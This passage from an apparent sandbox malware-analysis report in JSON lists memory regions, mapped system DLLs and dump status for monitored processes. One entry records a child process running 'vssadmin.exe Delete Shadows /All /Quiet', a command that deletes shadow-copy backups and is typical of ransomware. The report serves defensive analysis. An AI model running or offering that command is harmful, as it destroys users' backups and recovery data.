[ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1192", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:08:10.493", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001193-addr_0x0000000000260000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_783", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_1193", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:08:10.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1937045400, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1194", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:08:10.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937366648, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1195", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:08:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937539071, "entry_point": 1937514744, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1196", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:08:10.515", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1197", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:08:10.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1198", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:08:10.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1199", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:08:10.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001200-addr_0x00000000004f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_784", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 6225919, "entry_point": 0, "filename": null, "id": "region_1200", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:08:10.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1958739968, "type": "region", "version": 1 }, "end_va": 1958768639, "entry_point": 1958739968, "filename": "\\Windows\\SysWOW64\\winbrand.dll", "id": "region_1201", "name": "winbrand.dll", "norm_filename": "c:\\windows\\syswow64\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1958739968, "timestamp": "00:08:10.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1959903231, "entry_point": 1959858401, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1202", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:08:10.620", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1959919616, "type": "region", "version": 1 }, "end_va": 1960312831, "entry_point": 1960027059, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1203", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1959919616, "timestamp": "00:08:10.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1965359103, "entry_point": 1964323539, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1204", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:08:10.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1966407679, "entry_point": 1965471469, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1205", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:08:10.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967456255, "entry_point": 1966885349, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1206", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:08:10.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968099327, "entry_point": 1967669207, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1207", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:08:10.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968152575, "entry_point": 1968125600, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1208", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:08:10.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1968219250, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1209", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:08:10.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1971257344, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971324265, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1210", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1971257344, "timestamp": "00:08:10.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972240384, "type": "region", "version": 1 }, "end_va": 1972342783, "entry_point": 1972259189, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1211", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972240384, "timestamp": "00:08:10.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1972371456, "type": "region", "version": 1 }, "end_va": 1972658175, "entry_point": 1972401272, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1212", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972371456, "timestamp": "00:08:10.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974231875, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1213", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:08:10.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1995153407, "entry_point": 0, "filename": null, "id": "region_1214", "name": "private_0x0000000076dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994129408, "timestamp": "00:08:10.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995177984, "type": "region", "version": 1 }, "end_va": 1996353535, "entry_point": 0, "filename": null, "id": "region_1215", "name": "private_0x0000000076ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995177984, "timestamp": "00:08:10.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1216", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:08:10.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1217", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:08:10.642", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001218-addr_0x0000000000720000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_785", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7536639, "entry_point": 0, "filename": null, "id": "region_1218", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:08:10.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 9142271, "entry_point": 0, "filename": null, "id": "region_1219", "name": "pagefile_0x0000000000730000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7536640, "timestamp": "00:08:10.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966800895, "entry_point": 1966478735, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1220", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:08:10.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1971175423, "entry_point": 1970345611, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1221", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:08:10.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1222", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:08:10.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_1223", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:08:10.658", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001224-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_786", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1224", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:08:10.659", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001225-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_787", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_1225", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:08:10.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 10751999, "entry_point": 0, "filename": null, "id": "region_1226", "name": "pagefile_0x00000000008c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9175040, "timestamp": "00:08:10.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10813440, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_1227", "name": "pagefile_0x0000000000a50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10813440, "timestamp": "00:08:10.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 35205119, "entry_point": 0, "filename": null, "id": "region_1228", "name": "pagefile_0x0000000001e50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31784960, "timestamp": "00:08:10.660", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001229-addr_0x0000000000110000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_788", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_1229", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:08:10.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 38203391, "entry_point": 35258368, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1515", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35258368, "timestamp": "00:08:11.920", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "vssadmin.exe Delete Shadows /All /Quiet", "filename": "c:\\windows\\syswow64\\vssadmin.exe", "id": "proc_6", "image_name": "vssadmin.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00001230-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_789", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1230", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:08:10.741", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001231-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_790", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1231", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:08:10.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1232", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:08:10.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1233", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:08:10.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1234", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:08:10.746", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001235-addr_0x0000000000110000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_791", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_1235", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:08:10.747", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001236-addr_0x0000000000150000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_792", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1236", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:08:10.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5763071, "entry_point": 5636096, "filename": "\\Windows\\SysWOW64\\vssadmin.exe", "id": "region_1237", "name": "vssadmin.exe", "norm_filename": "c:\\windows\\syswow64\\vssadmin.exe", "region_type": "memory_mapped_file", "start_va": 5636096, "timestamp": "00:08:10.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1998098431, "entry_point": 1996357632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1238", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:08:10.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1999896575, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1239", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:08:10.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1240", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:08:10.761", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001241-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_793", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1241", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:08:10.762", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001242-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_794", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1242", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:08:10.762", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001243-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_795", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1243", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:08:10.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1244", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:08:10.763", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001245-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_796", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1245", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:08:10.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1246", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:08:10.763", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001247-addr_0x0000000000360000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 